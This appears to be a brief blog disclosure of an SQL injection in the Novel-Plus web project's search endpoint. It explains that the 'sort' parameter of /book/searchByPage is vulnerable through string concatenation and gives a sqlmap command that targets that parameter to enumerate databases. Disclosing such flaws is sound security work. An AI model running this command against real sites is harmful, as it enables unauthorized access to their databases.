Novel-Plus SQLi
Vulnerability describes
SQL injection is caused by string concatenation in the front end of the Novel-Plus project.
Vulnerability details


This is the page with normal parameters

We can use SQLi in the sort argument.

Attack
python2 sqlmap.py -u "http://URL/book/searchByPage?curr=1&limit=20&keyword=%25&sort=1*" --level 3 --dbs



本文系作者 @孤独常伴 原创发布在 L0ne1y。未经许可,禁止转载。